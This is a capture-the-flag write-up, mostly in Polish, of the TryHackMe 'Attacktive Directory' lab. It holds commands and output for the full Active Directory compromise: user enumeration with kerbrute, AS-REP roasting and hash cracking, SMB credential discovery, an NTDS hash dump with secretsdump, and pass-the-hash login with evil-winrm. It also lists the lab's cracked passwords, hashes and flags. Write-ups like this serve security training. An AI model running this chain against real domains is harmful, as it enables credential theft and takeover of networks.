# Attackive Directory
Hacker: hubert

IP 10.10.70.121

Nazwa pelnej domeny spookysec.local

Uzywajac narzedzia kerbrute z odpowiednimi parametrami (Zobacz zakladke kerbrute) oraz uzywajac odpowiedniej listy slow otrzymujemy wszystkich uzytkownikow jednakze najwazniejsi sa dla nas backup i svc-admin

GetNPUsers.py to część pakietu Impacket, służąca do enumeracji kont domenowych, które mają włączone ustawienie “Do not require Kerberos preauthentication”. Dzięki temu można uzyskać hashy AS-REP (TGT) i próbować je złamać offline (atak typu AS-REP roasting)  (Get-NPUsers.py)

Po zlamaniu hasha uzywajac hashcata (Get-NPUsers.py) otrzymujemy haslo do zalogowania sie do SMB

Do podgladu udostepnionych folderow w SMB posluzy nam narzedzie smbclient (smbclient), po zalogowaniu sie na backup otrzymujemy zakodowane login i haslo do konta backup

Uzywajac konta ktore w zalozeniu jest kontem przywracajacym dane czyli ma wszystkich uzytkownikow mozemy za pomoca narzedzia secretsdump.py aby wyswietlil nam zawartosc pliku ntds.dit (secretsdump.py)

Uzywajac hash konta Administrator mozemy uzyc narzedzia evil-winrm do zdalnego otrzymania dostepu do maszyny na konto administratorskie (evil-winrm)

Flagi:
TryHackMe{K3rb3r0s_Pr3_4uth}
TryHackMe{4ctiveD1rectoryM4st3r}
TryHackMe{B4ckM3UpSc0tty!}

## nmap
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-05 19:38:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-04-04T19:25:46
|_Not valid after:  2025-10-04T19:25:46
|_ssl-date: 2025-04-05T19:40:12+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-04-05T19:39:46+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  unknown
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  unknown
49678/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC

## enum4linux
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Apr  5 21:30:06 2025

 =========================================( Target Information )=========================================
                                                                                                                                 
Target ........... 10.10.70.121                                                                                                  
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.70.121 )============================
                                                                                                                                 
                                                                                                                                 
[E] Can't find workgroup/domain                                                                                                  
                                                                                                                                 
                                                                                                                                 

 ================================( Nbtstat Information for 10.10.70.121 )================================
                                                                                                                                 
Looking up status of 10.10.70.121                                                                                                
No reply from 10.10.70.121

 ===================================( Session Check on 10.10.70.121 )===================================
                                                                                                                                 
                                                                                                                                 
[+] Server 10.10.70.121 allows sessions using username '', password ''                                                           
                                                                                                                                 
                                                                                                                                 
 ================================( Getting domain SID for 10.10.70.121 )================================
                                                                                                                                 
Domain Name: THM-AD                                                                                                              
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

[+] Host is part of a domain (not a workgroup)                                                                                   
                                                                                                                                 
                                                                                                                                 
 ===================================( OS information on 10.10.70.121 )===================================
                                                                                                                                 
                                                                                                                                 
[E] Can't get OS info with smbclient                                                                                             
                                                                                                                                 
                                                                                                                                 
[+] Got OS info for 10.10.70.121 from srvinfo:                                                                                   
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED                                                           


 =======================================( Users on 10.10.70.121 )=======================================
                                                                                                                                 
                                                                                                                                 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                             
                                                                                                                                 
                                                                                                                                 

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                              
                                                                                                                                 
                                                                                                                                 
 =================================( Share Enumeration on 10.10.70.121 )=================================
                                                                                                                                 
do_connect: Connection to 10.10.70.121 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                          

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.70.121                                                                                     
                                                                                                                                 
                                                                                                                                 
 ============================( Password Policy Information for 10.10.70.121 )============================
                                                                                                                                 
                                                                                                                                 
[E] Unexpected error from polenum:                                                                                               
                                                                                                                                 
                                                                                                                                 

[+] Attaching to 10.10.70.121 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.70.121)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient                                                                                 
                                                                                                                                 
                                                                                                                                 

 =======================================( Groups on 10.10.70.121 )=======================================
                                                                                                                                 
                                                                                                                                 
[+] Getting builtin groups:                                                                                                      
                                                                                                                                 
                                                                                                                                 
[+]  Getting builtin group memberships:                                                                                          
                                                                                                                                 
                                                                                                                                 
[+]  Getting local groups:                                                                                                       
                                                                                                                                 
                                                                                                                                 
[+]  Getting local group memberships:                                                                                            
                                                                                                                                 
                                                                                                                                 
[+]  Getting domain groups:                                                                                                      
                                                                                                                                 
                                                                                                                                 
[+]  Getting domain group memberships:                                                                                           
                                                                                                                                 
                                                                                                                                 
 ==================( Users on 10.10.70.121 via RID cycling (RIDS: 500-550,1000-1050) )==================
                                                                                                                                 
                                                                                                                                 
[I] Found new SID:                                                                                                               
S-1-5-21-3591857110-2884097990-301047963                                                                                         

[I] Found new SID:                                                                                                               
S-1-5-21-3591857110-2884097990-301047963                                                                                         

[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''                     
                                                                                                                                 
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)                                         
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)

[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''                      
                                                                                                                                 
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)                                                   
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)

## kerbrute
 ./kerbrute_linux_386 userenum -d spookysec.local --dc 10.10.70.121 ~/users.txt 



Version: v1.0.3 (9dad6e1) - 04/05/25 - Ronnie Flathers @ropnop

2025/04/05 21:56:10 >  Using KDC(s):
2025/04/05 21:56:10 >   10.10.70.121:88

2025/04/05 21:56:10 >  [+] VALID USERNAME:       james@spookysec.local
2025/04/05 21:56:12 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2025/04/05 21:56:15 >  [+] VALID USERNAME:       James@spookysec.local
2025/04/05 21:56:15 >  [+] VALID USERNAME:       robin@spookysec.local
2025/04/05 21:56:21 >  [+] VALID USERNAME:       darkstar@spookysec.local
2025/04/05 21:56:32 >  [+] VALID USERNAME:       administrator@spookysec.local
2025/04/05 21:56:42 >  [+] VALID USERNAME:       backup@spookysec.local
2025/04/05 21:56:45 >  [+] VALID USERNAME:       paradox@spookysec.local
2025/04/05 21:57:11 >  [+] VALID USERNAME:       JAMES@spookysec.local
2025/04/05 21:57:22 >  [+] VALID USERNAME:       Robin@spookysec.local


## Get-NPUsers.py
impacket-GetNPUsers spookysec.local/ -usersfile users.txt -no-pass -dc-ip 10.10.70.121


hashcat -m 18200 -a 0 svcadmin.hash pass.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:bbf81a7d6d8fd9407b600f11478f8d37$29f28d857d7e1b5e3f4c721925de22fa2236055f52d0a427bc5e2a94a0915cc644b89d3c1527c4280a3b87f8005e8c40824b97a65415c481ea6fdb13be6f3aabfdc98fda309fb7531abfaf12eb2692d26b510e3ccd6c947bf696ad42238d82e4840848327bcb054e3464a01c7f53d484101d053c00e8d1618024d02276d219f97e2155ae36a82f43b811a7033cc12840056ec3ebfdf43659f71d2dbb31e24e2dee36b37068f99d0c81b6c2b7b85ee8172106b471e6554b238cdd9b7bf0efdcabe508af866259fcbf519647cbbf70ec23b1c4fa0a20e51baf3c750b6d2b66da83c61d665667cb51f82cc56c10d9905051d01b


svc-admin:management2005

## smbclient
smbclient -L spookysec.local --user svc-admin

Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share


smbclient //spookysec.local/backup -U svc-admin

cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

backup@spookysec.local:backup2517860

## secretsdump.py
impacket-secretsdump -just-dc backup@spookysec.local

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:cfe28e90c2d99c1bae5f6cc3ac9769f7:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:424a5e0825d1b086063a7486a65156e95824e0494a1b251e75d9a927193583b0
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:98754c8e1a0221c16c1bc37ad7a510f3
ATTACKTIVEDIREC$:des-cbc-md5:cb0bd691cebf0176


## evil-winrm
evil-winrm -i 10.10.70.121 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
TryHackMe{4ctiveD1rectoryM4st3r}


*Evil-WinRM* PS C:\Users\svc-admin> cd Desktop
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> ls


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cat user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}

